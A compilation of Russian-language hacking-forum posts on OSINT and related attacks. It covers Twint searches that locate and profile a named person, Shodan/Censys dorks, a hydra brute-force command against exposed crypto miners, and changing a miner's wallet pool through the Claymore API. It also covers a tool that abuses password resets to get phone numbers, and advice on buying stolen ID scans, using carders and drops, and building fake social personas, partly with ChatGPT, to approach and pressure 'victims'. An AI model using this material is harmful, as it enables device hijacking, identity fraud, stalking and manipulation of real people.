Это не единственное фото, которым я заинтересовался. Как вы могли заметить,
постов нашлось несколько, и все они могут быть полезными во время
расследования. На другом фото с меткой «gun» этого года, он держит патрон 5,7
× 28 мм на фоне пистолета FN Five-seven.
Этот пистолет позволяет пробивать легкие бронежилеты, при помощи бронебойных пуль (таких, как на изображении ниже - с черным наконечником), выпущенных с очень высокой скоростью.
Пуля SS190 имеет стальной наконечник и алюминиевый сердечник, поэтому любой
сотрудник правоохранительных органов, пытающийся подойти к подозреваемому, не
должен полагаться на легкий бронежилет, в целях безопасности. С помощью одного
поиска в Twint мы определили не только то, что подозреваемый вооружен, но и
то, что он также имеет доступ к специальным типам боеприпасов.
Шаг #6: Сбор данных в реальном времени
Преимущество Twint заключается в возможности получать информацию о событиях в
реальном времени. К примеру, при помощи флагов, мы можем указать только
сообщения на интересующие нас события, которые происходят поблизости.
Допустим, мы услышали за окном полицейскую сирену и хотим знать, что происходит. Мы можем искать сообщения, помеченные рядом с нами (в данном случае, рядом с L.A.) и поиск по ключевым словам, такими как «arrested» или «LAPD».
Code:Copy to clipboard
sudo twint --verified -s "arrested" --near 'Los Angeles' --since 2019-02-17 --images
Результат:
Code:Copy to clipboard
1097368136293208064 2019-02-17 21:32:06 PST <KTLAMorningNews> Suspected DUI Driver Arrested in Deadly Hit-and-Run Crash in South-Central L.A. Caught on Video http://bit.ly/2SJbRGO pic.twitter.com/T2EYC0OtRB
1097353829375463425 2019-02-17 20:35:15 PST <KTLA> Yucaipa Father Arrested in Death of 6-Month-Old Baby Girl http://bit.ly/2SF1Ydx pic.twitter.com/O8Sd0k9wLt
Если, вместо изображений, мы хотим найти видео-доказательства, мы можем изменить команду для поиска видео контента.
Code:Copy to clipboard
sudo twint --verified -s "LAPD" --near 'Los Angeles' --since 2019-02-17 --videos
Результат:
Code:Copy to clipboard
1097300577447378944 2019-02-17 17:03:39 PST <KevinTakumi> Fatal #crash #Chatsworth LAFD/LAPD on scene 2 car crash DeSoto/Plummer 2 transported to hospital 2 dead on scene, investigation ongoing long term @FOXLA pic.twitter.com/srlUTlgtdF
1097264275586871296 2019-02-17 14:39:24 PST <LAPDHQ> Our city might not be perfect, but it has life — it has culture. It’s our privilege to be able to serve and protect the City of Angels. pic.twitter.com/yqXWyIIq8w
Теперь давайте применим возможность извлечения данных для ранее названной цели. Кто является сторонниками этого человека? Создадим CSV-файл для каждого, кто вызывался помочь ему, используя флаг --to и -s.
Code:Copy to clipboard
sudo twint --to officialmcafee --since 2019-01-01 -s help -o mcafeecontacts --csv
Результат:
Code:Copy to clipboard
1097503235684864000 2019-02-18 06:28:56 PST <FlyCryptoGuy> Which side defends the bees? Bees die, man dies. Why don't you support #Buzzcoin bro? Help mankind. Save the damn bees. It's easy to throw insults, start throwing solutions. Thank you sir.
1097356068164898816 2019-02-17 20:44:09 PST <SkepticalMinded> Well said, the labels that hold people back as a true progressive society, are the same labels that help those same people feel belonged and validated. So in other words fuck what people think and be yourself.
1097280716466020353 2019-02-17 15:44:43 PST <BitcoinGhost1> I'm in Germany, put me in mind and I'll be ready to help.
Открыв CSV файл, мы видим, что он полон недавних ответов.
Отлично, теперь мы можем точно сказать, что Джон Макафи, уклоняющийся от
налогов, хорошо вооружен и имеет сторонников, готовых прийти ему на помощь.
Шаг #7: Углубленный поиск
Допустим, теперь мы хотим получить сведения о том, как цель скрывала свои деньги, прежде чем сказать об уклонении от уплаты налогов.
Поскольку субъект сделал много заявлений о налогах с тех пор, как началась история, мы хотим найти заявления, сделанные до этого периода, только с использованием флага --year. Нас интересуют ключевые слова «taxes» или «tax» в любых сообщениях, опубликованных до 2018 года. Мы это можем сделать при помощи следующей команды:
Code:Copy to clipboard
sudo twint -u officialmcafee -s taxes --year 2018
Результат:
Code:Copy to clipboard
947326031890911233 2017-12-30 20:38:21 PST <officialmcafee> When I follow someone, God gives them a new Bentley Azure. Tax free.
947325176701706241 2017-12-30 20:34:57 PST <officialmcafee> When I follow someone God himself comes down and gives them a Bentley Azure. Tax free. It used to be Ford Focus. Don't know why the upgrade.
947007111011151872 2017-12-29 23:31:04 PST <officialmcafee> As I said earlier ..... When I follow someone God himself comes down and gives them a new Bentley Azure ..... Tax free.
947005611253919744 2017-12-29 23:25:06 PST <officialmcafee> I did. But I don't believe your name is Tom. You realize, of course, that when I follow people, God himself comes down and blesses them - giving each of them a Bentley Azure - tax free.
939924816664121345 2017-12-10 10:28:33 PST <officialmcafee> Good God! Do I have to spell it out? Well ... No taxes, no regulatory problems, no traceable income, no tax accountant costs, etc,etc,etc
644436140183973888 2015-09-17 02:02:03 PST <officialmcafee> My policies now posted https://mcafee16.com/issues/ #ForeignPolicy #drugs #immigrants #tax #educate #economy #cyber +more pic.twitter.com/ugCnhKEBsL
Похоже, цель сделала заявления о сокрытии денег в криптовалюте.
Зная, что подозреваемый находится в бегах, мы можем осуществить поиск любого, кто обратится к "officialmcafee" и предложит поддержку. Для этого мы будем использовать флаг --to, и искать твиты, которые могут содержать контактную информацию, при помощи флага --phone.
Мы также можем попытаться выяснить, где находится наша цель, выполнив поиск фотографий или видео, которые она опубликовала на прошлой неделе. Мы будем использовать флаг --location, чтобы оставить только твиты с координатами.
Code:Copy to clipboard
sudo twint -u officialmcafee --location --since 2019-2-10 --media
Результат:
Code:Copy to clipboard
1096942869091356674 2019-02-16 17:22:14 PST <officialmcafee> pic.twitter.com/vbtdCI6ULP | Location House McAfee
1096932395012554754 2019-02-16 16:40:37 PST <officialmcafee> Back at the third floor of the "compound". We are just mellowing out after a day of speeding between islands in my first test of our tender (Moored alongside) pic.twitter.com/sd0ix15MPB | Location House McAfee
1096929852056395776 2019-02-16 16:30:31 PST <officialmcafee> Here is the third floor of our "Compound" right now. The "dingy" is moored alongside. pic.twitter.com/UCnRn3AoJX | Location House McAfee
1096915137087320064 2019-02-16 15:32:03 PST <officialmcafee> A boring video. But Rick took it. He's proud of it. He asked me to tweet it. I just did. He is outside of social media however, so I can dis him in this (for him) alternate universe, while I truly love him in that universe which, for me at this moment time, is alternate. pic.twitter.com/yXPdGF3oW1 | Location House McAfee
1096635092393517056 2019-02-15 20:59:15 PST <officialmcafee> Rick caught me with my harmonica attempting to regain favor with IT guy. He was way out of my league. pic.twitter.com/5HZxPKwyf8 | Location House McAfee
1096614989857738752 2019-02-15 19:39:22 PST <officialmcafee> Holy FUCK!!! My Bahamian IT guy -- whom I judged to be the dweebyest person on earth -- shows up in the band I hired for Choppy's bar for the weekend. People -- never judge. The IT guy is the sax player. pic.twitter.com/e0KW6fWIbY | Location House McAfee
Одним из первых результатов является видео о том, как Джон Макафи ведет лодку возле островов. В другом твите, на днях, Джон Макафи фотографируется в баре, в Джорджтауне, городе на Багамах. По сообщениям СМИ, опубликованным в Твиттере за последние два дня, цель находится на лодке у побережья Джорджтауна, на Багамах.
Twitter упрощает OSINT
В нашей истории о младшем агенте IRS и преступнике Джоне Макафи, агент смог
определить, что подозреваемый имеет бронебойное оружие и находится на
островах, в Карибском море. Теперь, вместо того, чтобы попытаться поймать
правонарушителя лично, гораздо более вероятно, агент воспользутся договором об
экстрадиции, вступившем в силу между Багамскими Островами и Соединенными
Штатами 22 сентября 1994 года.
Информация из социальных сетей должна быть частью инструментария любого человека, занимающегося OSINT: начиная с изучения взаимодействия между пользователями и заканчивая поиском альтернативных взглядов на ту же ситуацию с помощью средств массовой информации, организованных хэштегами.
Автор: t.me/cybred
Open Source Intelligence(OSINT)
Это один из первых способов сбора информации до атаки. В прошлом было много
случаев взлома при помощи OSINT. Вместе с развитием устройств передачи
информации, мы можем собрать огромный объем важных данных в общедоступной
сети. В этой статье, мы будем собирать данные для майнеров криптовалют
(Биткоин[Antminer] и Эфир[Claymore]).
Прощупываем Antminer!
Самый лучший ASIC биткоин майнер это Antminer S9/S7. Аппаратное обеспечение
майнера использует веб-сервер “lighttpd/1.4.32 и некоторые имеют открытые SSH
порты. Существует эксплоит для версии“Lighttpd 1.4.31”, однако, вы не сможете
получить доступ к серверу с данным эксплоитом.
Веб-страница на веб-сервере защищена «HTTP Аутентификацией Дайджест». Критической точкой является то, что шахтерам требуется имя пользователя и пароль для входа в систему.Критическая суть в том, что майнеру требуется имя пользователя и пароль для входа в систему.
На странице конфигурации antMiner используется «Аутентификация Дайджест»
Известно сто нам нужно информация или ключевики(ключевые слова) чтобы собрать данные при помощи технологии OSINT. Эта информация является ключевым словом, включая «antMiner Конфигурации» в заголовках HTTP, которые появляются каждый раз, когда я отправляю запрос на сервер. Я искал на censys.io и на shodan.io при помощи особых дорков и собрал IP-адреса.
Code:Copy to clipboard
(antminer) AND protocols.raw: “80/http” AND 80.http.get.title: “401”
https://censys.io/ дорки поиска
Доступ к системе можно получить при помощи брутфорс атаки на HTTP порт или на SSH порт.
Сперва мне понадобилось руководство пользователя чтобы узнать HTTP имя пользователя и пароль по умолчанию. После я поискал в гугле по ключевым словам на английском “antminer default password” и нашел сайт в который содержал в себе Руководство для пользователя.
Руководство для пользователя AntMiner | Мы можем с лёгкостью найти в поисковике
Для данного мануала , я предпочел использовать hydra для брутфорс атаки (Bruteforcing HTTP Digest Authentication- Брутфорс HTTP аутенсификации дайджест) с открытыми наиболее популярными распространёнными 10 000 паролями. Также можно использовать Burp Suite Intruder
Code:Copy to clipboard
hydra -l root -P commonPasswords.txt -vV {TARGET} http-get /
Если тебе посчастливилось получить доступ на страницу конфигурации.
Страница конфигурации antMiner
Click to expand...
Злоумышленники могут редактировать страницу по своему желанию.
Программное обеспечение майнера Claymore
Другой тип атаки также нацелен на программное обеспечение майнера Claymore
Miner (например, Altcoins, ethereum, майнер zcash)
Я совершил другой поиск в shodan.io с помощью конкретных дорков.
Дорки: “ETH — Total Speed:”
Click to expand...
Можете отправить несколько пакетов JSON (JavaScript Object Notation — текстовый формат обмена данными) с помощью API-интерфейса Claymore Remote Manager для удаленного управления сервером майнера.
Тут мы, управляем графическими процессорами (отключаем, включаем сдвоенный режим и т.д) или же редактируем config.txt чтобы изменить пул адреса кошелька отправив несколько команд.
Claymore Remote Manager API.txt
Click to expand...
Мы отправим команду “miner_restart” или “control_gpu” чтобы определить является ли он в режиме только для чтения или записи/чтения. Я использовал NC для отправки JSON команды на MacOS.
Сперва, мы попытаемся выполнить команду с “miner_getstat1”
Этот код дает статистику майнер-сервера.
Click to expand...
После этого мы попытаемся отправить команду с“control_gpu” чтобы определить является ли он в режиме только для чтения или записи/чтения.
Мы получили сообщение об ошибке с кодом указанным ниже.
Сервер майнера имеет режим только чтение.
Click to expand...
Мне удалось перезапустить систему, когда использовал другой IP-адрес. Тут показало, что Claymоre Remоte Mаnаger API позволяет чтение / запись аутентификацию.
Перезапуск майнер сервера.
Click to expand...
Claymore Remote Manager также позволяет редактировать файл конфигурации с использованием формата JSON (отправив JSON -файл). Тем не менее, вы можете с лёгкостью отредактировать его с помощью Claymore’s Ethereum Dual Miner Manager в Windows, также можете изменить пул адрес кошелька.
![](/proxy.php?image=https%3A%2F%2Fmiro.medium.com%2Fmax%2F1079%2F0%2A3BraDIqHxTA- yp_a.png&hash=13175f7e94b19d15dc5f45c7767aa457)
Если у вас есть разрешение чтения/записи, ты можешь редактировать config.txt
Click to expand...
Можно увидеть/отредактировать пул адрес кошелька.
Click to expand...
Фантази для взлома:
looking to buy Pipl.com Email only at kokoshis@protonmail.com
ReconSpider является самой передовой платформой с открытым исходным кодом
(OSINT (Open Source INTelligence; поиск, сбор и анализ информации, полученной
из общедоступных источников ) для сканирования IP-адресов, электронных писем,
веб-сайтов, организаций и поиска информации из разных источников.
ReconSpider может использоваться исследователями Infosec, тестерами на
проникновение (Пентестарами), охотниками за ошибками и исследователями
киберпреступности, чтобы найти глубоко спрятанную с самых тёмных уголках
интернета информацию о своей цели.
ReconSpider объединяет все необработанные данные, визуализирует их на
приборной панели и облегчает оповещение и мониторинг данных.
ReconSpider также сочетает в себе возможности
Photon и Recon
Dog для всестороннего перечисления
поверхности атаки.
Почему такое название?
ReconSpider = recon + spider
Recon = раздедка (Или же более специализировано исследование)
Разведка - это миссия для получения информации с помощью различных методов обнаружения о деятельности и ресурсах противника или потенциального противника, а также о географических характеристиках конкретного района.
Spider = веб-сканер
Сканер, иногда называемый пауком или паукообразным роботом и часто сокращаемый до сканера, представляет собой интернет-бота, который систематически просматривает Всемирную паутину, как правило, с целью индексации в Интернете (веб-паук)
Версия (В бета разработке; β )
Code:Copy to clipboard
ReconSpider : 1.0.5
Website : reconspider.com
Обзор инструмента:
Интеллект карта
Посмотрите на нашу интеллект-карту, чтобы увидеть визуально упорядоченную
информацию об этом инструменте, касающуюся API, сервисов и методов, и многое
другое.
http://reconspider.com/mindmap.html
(Изображение настолько большое, что я поместил его в спойлер)
Spoiler: Интеллект-карта
Информация о лицензии
ReconSpider and its documents are covered under GPL-3.0 (General Public License v3.0)
Баннер ReconSpider
Code:Copy to clipboard
__________ _________ __ ___
\______ \ ____ ____ ____ ____ / _____/_____ |__| __| _/___________
| _// __ \_/ ___\/ _ \ / \ \_____ \\____ \| |/ __ |/ __ \_ __ \
| | \ ___/\ \__( <_> ) | \ / \ |_> > / /_/ \ ___/| | \/
|____|_ /\___ >\___ >____/|___| / /_______ / __/|__\____ |\___ >__|
\/ \/ \/ \/ \/|__| \/ \/
developer: https://bhavkaran.com
ENTER 0 - 7 TO SELECT OPTIONS
1. IP Enumerate information from IP Address
2. URL Gather information about given Website
3. WHOIS Gather domain registration information
4. DNS MAP Map DNS records associated with target
5. PORT SCAN Discover hosts and services on a network
6. NS LOOKUP Obtain domain name or IP address mapping
7. HONEYPOT Check if it's honeypot or a real system
8. UPDATE Update ReconSpider to its latest version
0. EXIT Exit from ReconSpider to your terminal
Документация
Установить и использовать ReconSpider очень просто. Процесс установки очень прост.
Давайте начнем!
Настройка среды использования (операционная система Linux)
Шаг 1 - Клонирование ReconSpider в вашей системе Linux.
Чтобы скачать ReconSpider, просто клонируйте репозиторий github. Ниже приведена команда, которую вы можете использовать для клонирования репозитория ReconSpider.
git clone https://github.com/bhavsec/reconspider.git
Шаг 2 - Установка всех зависимостей.
Как только вы клонируете ReconSpider, вы найдете имя каталога в качестве ReconSpider. Просто зайдите в каталог и установите с помощью этих команд:
cd reconspider
sudo python setup.py install
Настройка среды (операционная система Windows)
Шаг 1 - Загрузка ReconSpider в вашей системе Windows.
Чтобы скачать ReconSpider из репозитория github, просто скопируйте и вставьте этот URL в ваш любимый браузер.
https://github.com/bhavsec/reconspider/archive/master.zip
Шаг 2 - Распаковка файла
После загрузки вы найдете заархивированное имя файла datasploit-master.zip . Просто щелкните правой кнопкой мыши на этом заархивированном файле и разархивируйте файл, используя любое программное обеспечение, такое как WinZip , WinRAR .
Шаг 2 - Установка всех зависимостей.
После разархивирования перейдите в этот каталог с помощью командной строки и введите следующую команду.
python setup.py install
Использование
ReconSpider - очень удобный инструмент и простой в использовании. Все, что вам нужно сделать, это просто передать значения в параметр. Чтобы запустить ReconSpider, просто наберите:
python reconspider.py
1. IP
Эта опция собирает всю информацию данного IP-адреса из общедоступных ресурсов.
ReconSpider >> 1
IP >> 8.8.8.8
2. URL
Эта опция собирает всю информацию о заданном URL-адресе из открытых источников и дает вам подробную информацию об IP-адресе, стране, городе, организации, интернет-провайдере, открытых портах и так далее.
ReconSpider >> 2
URL >> vulnweb.com
3. WHOIS
Эта опция позволяет вам искать доступность доменного имени и информацию WHOIS, включая имя, организацию, адрес, город, страну, почтовый индекс, регистратора, серверы имен и т. Д.
ReconSpider >> 3
WHOIS (URL) >> google.com
4. DNS MAP
Этот параметр позволяет сопоставить поверхность атаки организации с виртуальной картой записей DNS, связанных с целевой организацией.
ReconSpider >> 4
DNS MAP (URL) >> vulnweb.com
5. PORT SCAN
Эта опция позволяет вам определить, какие хосты доступны в сети, какие сервисы (имя и версия приложения) предлагают эти хосты, какие операционные системы (и версии ОС) они используют, какой тип фильтров/брандмауэров пакетов используется, и десятки других характеристик.
ReconSpider >> 5
PORT SCAN (URL / IP) >> vulnweb.com
6. NS LOOKUP
Эта опция позволяет получить информацию об интернет-серверах. Он находит информацию о сервере имен для доменов, запрашивая систему доменных имен.
ReconSpider >> 6
NS LOOKUP (URL) >> google.com
7. HONEYPOT
Эта опция позволяет идентифицировать приманки! Вероятность того, что IP является приманкой, фиксируется значением «Honeyscore», которое может варьироваться от 0,0 до 1,0.
ReconSpider >> 7
HONEYPOT (IP) >> 1.1.1.1
8. ОБНОВЛЕНИЕ
Эта опция позволяет вам проверять наличие обновлений. Если будет доступна более новая версия, ReconSpider загрузит и объединит обновления в текущий каталог, не перезаписывая другие файлы.
ReconSpider >> 8
Checking for updates..
0. ВЫХОД
Эта опция позволяет вам выйти из ReconSpider Framework в терминал вашей текущей операционной системы.
ReconSpider >> 0
Bye, See ya again..
Связаться с разработчиком
Вы хотите поговорить с разработчиком?
Twitter: @bhavsec
Facebook: fb.com/Mr.BhavKaran
Instagram: instagram.com/bhav_karan
LinkedIn: linkedin.com/in/bhav
Email: contact@bhavkaran.com
Website: [IRL]bhavkaran.com[/IRL]
ReconSpider Full Wiki и руководство по использованию
Пожалуйста, ознакомьтесь с Руководством по ReconSpider Wiki для подробного изучения каждой опции и функции.
Частые и беспроблемные обновления
ReconSpider находится в стадии интенсивной разработки и обновлений для исправления ошибок. Оптимизация производительности и новые функции регулярно обновляются. Пользовательская обработка ошибок также не реализована, и все внимание уделяется созданию необходимой функциональности.
Если вы хотите увидеть функции и проблемы, над которыми работаете, вы можете сделать это на доске проектов Development Progress .
Спасибо за прочтение данной статьи и хорошего дня
Страница на GitHub: https://github.com/bhavsec/reconspider
И отдельное спасибо за предложение данной статьи SEAdm1n
neopaket
Источник этого чуда - это github
email2phonenumber — это инструмент OSINT, который позволяет вам получить номер телефона цели, просто имея его адрес e-mail.
Этот инструмент помогает автоматизировать обнаружение чьего-либо телефонного номера, используя недостатки дизайна сброса пароля и общедоступные данные.
Поддерживает 3 основные функции:
Для корректной работы понадобится пара сторонних библиотек. Они могут быть
легко установлены с помощью:
pip install beautifulsoup4 requests
Использование
Поиск на сайтах по цифрам номера телефона
python email2phonenumber.py scrape -e target@email.co
Создать словарь действительных телефонных номеров на основе маски телефонного номера
python email2phonenumber.py generate -m 555XXX1234 -o /tmp/dic.txt
Найдите номер телефона цели, сбросив пароли на веб-сайтах, которые не предупреждают цель, используя маску номера телефона и прокси, чтобы избежать использования капч и других средств защиты от злоупотреблений.
python email2phonenumber.py bruteforce -m 555XXX1234 -e target@email.com -p /tmp/proxies.txt -q
Визуальное и практическое применение автор продемонстрировал на видео:
Плюс у него свой сайт и описанием и применением https://www.martinvigo.com/email2phonenumber/
OSweep
URL : https://github.com/ecstatic-nobel/OSweep
![](/proxy.php?image=https%3A%2F%2Fraw.githubusercontent.com%2Fecstatic- nobel%2FOSweep%2Fmaster%2Fstatic%2Fassets%2FosintSweep_dashboard.png&hash=82ff038242efbee4e6ba5d65f8df5c32)
GoogleTranslate said:
Если вы работаете в сфере информационной безопасности, то, скорее всего, вы используете OSINT, чтобы понять, о чем вас предупреждает SIEM и что все остальные в мире понимают. Скорее всего, вы используете более одной службы OSINT, потому что большую часть времени OSINT будет предоставлять вам только отчеты, основанные на последнем анализе IOC. Иногда этого достаточно. Они создают сетевые блоки и блоки электронной почты, создают новые правила для своих IDS / IPS, обновляют содержимое в SIEM, создают новые оповещения для мониторов в Google Alerts и DomainTools и т. Д. И т. Д. Для других они применяют те же контрмеры на основе предоставленных отчетов от их сторонние инструменты, за которые компания платит ТЫСЯЧИ долларов.
Проблема с обоими из них заключается в том, что аналитик должен копнуть немного глубже (например, ПОЛНОСТЬЮ деобфусцировать команду PowerShell, обнаруженную в вредоносном макросе), чтобы собрать все IOC. А что, если дополнительные IOC, на которых вы основываете свой анализ, не имеют ничего общего с тем, что является правдой об этом сайте сегодня? И тогда тебя обманывают? И тогда возникают другие вопросы со стороны руководства ...
Click to expand...
Установка:
Code:Copy to clipboard
cd /opt/splunk/etc/apps
git clone https://github.com/ecstatic-nobel/OSweep.git || wget https://github.com/ecstatic-nobel/OSweep/archive/master.zip
ls OSweep || unzip -o master.zip && mv OSweep-master OSweep && mv master.zip .OSweep-master.zip
sudo -H -u $SPLUNK_USER /opt/splunk/bin/splunk restart # $SPLUNK_USER = User running Splunk
Отредактируйте config.py
Code:Copy to clipboard
vim ./OSweep/etc/config.py
Сохраните config.py
Проинсталлируйте Pip пакеты:
Code:Copy to clipboard
cd /opt/splunk/etc/apps/OSweep/bin
bash py_pkg_update.sh
Осинтеры, привет!
Такой вопрос к Вам: на чём вы зарабатываете в черную?
Сложно ли научится osint? Если есть возможность, то подилитесь , пожалуйста,
ресурсами.
Дайте какой-то совет начинающим.
Спасибо.
There are multiple more general topics here on OSINT, but decided to make this one particularly focused on email OSINT.
Ones of the lovely github tools I like the most are:
-h8mail
-ghunt
-poastal
-mosint
-holehe
Which are the ones you guys prefer to use?
Я думаю многие столкнулись с той же проблемой что и я, а именно никак не могут получить логи и тд, так что же сейчас можно сделать с людьми на виртуальных/физических номерах вообще?(если садить на логгер, то подскажите как его получше маскировать)
Всем привет, посоветуйте книги по психологии, СИ, манипулированию. Я хочу увеличить свой кругозор, всегда знать что сказать, а также уметь грамотно распределить людей под себя.
Добрый день. С удовольствием поделюсь с вами набором малоизвестных инструментов для поиска информации:
Также вы можете воспользоваться телеграм-ботами:
Благодарю за внимание.
Автор: ShadowHawk
Автор: XEZIShttps://xss.is/members/390842/
Специально для: XSS.IS
И снова здравствуйте. Если не читали первую часть, то советую ознакомиться - https://xss.is/threads/125329/
Там я затронул основные темы по осинту, немного поверхностно, но суть передал. Было много вопросов, предложений, и прочего. Предложений кстати по работе, так как хороший осинт, он оказывается нужен всем. Я в той статье оставлял домашнее задание, и если вы справились, и в поисках работы, то прочитав эту статью, и завладев нужным инструментарием, смело можете выдвигаться на биржу труда, и предлагать свои услуги. Только покажите портфолио, и вас с большой долей вероятности трудоустроит к себе одна из команд.
Главное не стесняйтесь отходить от инструкций, придумывать свое, и показывать это в паблике.
Итак, сначала небольшой дисклеймер, или как он называется у грамотных писак:
1. Парни, я не прочь попиздеть в токсе, или личке, и поотвечать на ваши
вопросы. Даже бесплатно (хотя шеккели в виде благодарности приветствуются),
но, вы прежде чем врываться, постарайтесь грамотно сформулировать вопросы. И
попытаться самостоятельно найти ответ.
2. Я не трудоустраиваю никого. Все ваши работодатели потенциальные есть на
форуме. Поэтому ищите контакты и команды через форум. Советовать кого-то я не
буду.
3. Я пишу в первую очередь для себя, потому что мне нехуй делать, пока я не
дома. Поэтому если вам по каким-то причинам кажется, что я пишу не про то, или
что я должен писать про другое, то не утруждайтесь. Я художник, я так вижу.
Итак, на этом мы закончили вводную часть, и перейдем непосредственно к тому, про что я хочу писать. А именно - инструментарий, который поможет в нашем благородном деле. Сразу оговорюсь, вы используете все на свой страх и риск. Я не отвечаю ни за один софт и сервис. Я лишь говорю, что использую или использовал бы я. Отзывы, безопасность и прочее, ваша забота и только ваша. Читайте отзывы, гуглите, разбирайтесь. Я лишь писака.
Ну и картиночка, для затравки, чего можно добиться обычным осинтом и руками
(ну и немного помощью):
Начнем с простого, с финансов. Первое, что нам понадобится - это деньги. Хоть источники и открытые, но без денежек будет сложновато.
1. Криптокошелек.
Казалось бы, простая вещь, но многие ошибаются. Например подавляющее большинство знакомых юзает тот же exodus. А по нему бывают и такие новости - hxxps://www.bleepingcomputer[.]com/news/security/fbi-seized-23m-from- affiliate-of-revil-gandcrab-ransomware-gangs/
In a complaint unsealed today, the FBI seized 39.89138522 bitcoins worth approximately $2.3 million at current prices ($1.5 million at time of seizure) from an Exodus wallet on August 3rd, 2021.
Click to expand...
И это было 3 года назад. Сейчас технологии и прочее шагнули далеко вперед. Поэтому используем только холодные кошельки. Monero, BTC. Отдельные кошельки. Не забываем юзать миксеры, перекидывать на другие не связанные между собой кошельки и прочее.
Exodus тот же я использую, но там копейки в виде TRX и USDT чисто для расходов. Оплатить проксики, впночки, и прочая х#йня. Баксов 300-400$, не больше.
Поэтому первое, что надо сделать, это разделить финансы. Про безопасность и анонимность я не буду писать. Но не храните яйца в одной корзине. Под осинт и расходы - отдельный кошелек с минимумом средств. В моем случае это все таки Exodus и 300-400$. Именно из-за удобства.
2. Личности.
После того, как мы обзавелись кошельком с деньгами, нам надо понять на кого
все регистрировать. А регистрировать мы будем много всякого. Поэтому нам
понадобятся сканы. Купить их можно в разделе: https://xss.is/forums/136/
Я бы советовал взять пару USA сканов (паспорт, дл, селфи), пару сканов каких-
нибудь индусов (тот же комплект что и юса), и пару европейских стран (NL, DE,
FR). Такой же комплектации. На них будем вешать различные сервисы и заполнять
данные. Можно конечно и на себя, но лучше не надо.
3. Финансы (белые).
Так как осинт предполагает пользование всякими сервисами, в том числе и шодан,
ценсис и иже с ними, то их надо как-то оплачивать. Для этого нам нужны белые
карты.
В списке номер один у меня combo.cards (НЕ РЕКОМЕНДАЦИЯ!!!). Много бинов,
различные страны, наличие 3ds и прочего.
Далее, из того, что использовал и использую иногда:
abcard.io
pst.net
Тут нужно смотреть, куда какие карты лезут, и стоимость выпуска и комиссий за
транзакции. Вообще, со списком сервисов, которые предоставляют такие карты,
можно ознакомиться здесь:
cpa.rip/finance/bank-cards/
Из тех советов, что могу дать. Зарегайте сразу телегу + почту на данные кого- нибудь из европейцев, и в этих сервисах регайтесь под их данные. Например тот же PST для увеличения лимитов спокойно "кушает" сканы. Но помните, что даже если вы прошли верификацию, и у вас все хорошо, не храните там деньги. Закинули для оплаты нужного сервиса (пополняйте на процентов 10-20 больше, чем требуется), оплатили, и все. Один сервис - одна оплата - одно пополнение. Локнуть и сбежать с финансами могут в любой момент.
Еще в идеале вам конечно бы иметь PayPal и банковские счета. С первым
вариантов несколько:
1. Саморег, привязать карту, верифнуть и т.д.
2. Купить белый верифнутый PP. Сервисов в интернете так же много.
3. Обратиться к кардерам. Чтобы оплачивали они. Вариант не самый мой любимый,
но если что-то надо оплатить для теста, в чем вы не уверены (сервис, софт), то
лучше заплатить малый процент, чем всю сумму.
А насчет банковских счетов, тут даже я, не самый жадный человек, предпочитаю, чтобы в это инвестировала уже команда. Готовые никогда не держу, если работаем плодотворно, то тогда делаем их на дропов, или вымышленные данные.
4. Браузер.
Вообще, я предпочитаю впски, но для некоторых задач мы можем использовать
браузер и проксики. Я использую Dolphin (смотрите на том же cpa rip). Суть в
чем, бесплатно позволяет использовать до 10 профилей (этого нам хватит).
Удобная вещь, которая позволит вести активности на социальных профилях по типу
Фейсбука, икса (экс-твиттер), линкеда, и других.
Только учитывайте такой момент, что если вы собираетесь использовать его для
давления на жертв (хотя справедливости ради, и для обычных соц. взаимодействий
об этом тоже стоит подумать), то позаботьтесь о безопасности и анонимности. В
вашем случае я бы использовал его на виртуалке, пущенной через тор, за
проксиками и впном. Но опять же, безопасность и анонимность личное дело
каждого.
5. Проксики\соксы.
Здесь все достаточно просто, нам нужны СТАТИЧНЫЕ (то есть с постоянным айпи)
соксы. Я бы не писал много, но помониторив ру рынок, я немного охуел от цен.
Завышены они в несколько раз. Поэтому наш выбор это иностранные сервисы. Карты
у нас если что есть, для оплаты. Но зачастую они принимают и USDT.
Мониторим как минимум здесь:
blackhatworld.com/forums/proxies-for-sale.112/
Конкретные сервисы не буду рекомендовать, так как они у меня периодически лагают, или отваливаются, или попадают в блек листы. Но в целом есть достойные варианты, которые подходят. Методом проб и ошибок как говорится.
6. Социалочка.
Вот после того, как у нас есть браузер и проксики, настало время обзавестись семьей =).
Сразу поясню, иногда нам надо будет взаимодействовать с нашей жертвой (написать что-то), иногда может быть закрытый инстаграм профиль, и нам лучше добавиться в друзья, чтобы мониторить, что у него там происходит. Короче, нам нужны активные социальные профили, наполненные, чтобы выглядели как реальные. Можно купить готовы, но лучше сделать самому.
Сначала определимся, в каких сетях мы будем делать:
1. Facebook
2. Instagram
3. LinkedIn
4. Telegram (web)
5. WhatsApp (web)
6. X.com
7. reddit.com
Это основное. Так же советую сделать профили в СНГ соц. сетях на другие данные. Позже поясню зачем.
-----ЛЕГЕНДИРОВАНИЕ-----
Вообще, нам понадобиться штук 5-7 профилей в буржуйских соц. сетках, благо
бесплатная версия того же долфина это позволяет. Распределение предлагаю
сделать так:
2 профиля - мужики 40+, американцы.
2 профиля - девушка+женщина, американки.
1 мужик - европеец\индус, 30+
1 девушка - 25-30, индуска (индейка гыгыгы).
Каждую личность используем в зависимости от профиля жертвы. Если это серьезный
дядя, который далеко женат, то лучше добавляться от имени мужика\женщины.
Чтобы он не думал, что к нему в друзяшки добавилась знойная красотка, ибо это
всегда пахнет скамом. А нам такого не надо.
Я бы вам пересказал книги по психологии и социальным взаимодействиям, но мне
лень. Думайте тут сами, как подкатывать к жертве и с какого профиля
добавляться.
Так же создайте профиль в ВК и ОК. Отдельно. Оттуда мы будем парсить фотки. Сначала находите под критерии не самого популярного человека (то есть не кинозвезду =)). Парсим его\ее нейтральные фотки, и сохраням для каждого профиля. Фоток 20 будет достаточно. Общее фото, фото с отпуска и т.д.
Далее, как современные осинтщики и соц. инженеры, воспользуемся ИСКУСТВЕННЫМ
ИНТЕЛЛЕКТОМ!!! Идем в чатгпт или аналог, и просим составить биографию для
каждой личности. Уделяйте внимание деталям.
Берете за основу что-то такое, и постепенно докручиваете. Когда будете подбирать фотографии (жертву), смотрите чтобы она соответствовала возрасту. Можно и от обратного еще крутить, выбрав жертву, смотрите чем он увлекается, и крутите все это в чатгпт. В итоге у вас должна получиться цельная личность.
Кстати, прошу обратить внимание, что наш Джон например участвует в местной ассоциации фермеров. В том же Фейсбуке или на реддите можно найти такие группы, и вступить туда. Общаться можно с помощью той же нейронки, отвечая на комменты и прочее. В x.com можно репостить записи по теме, выражать свое мнение и т.д.
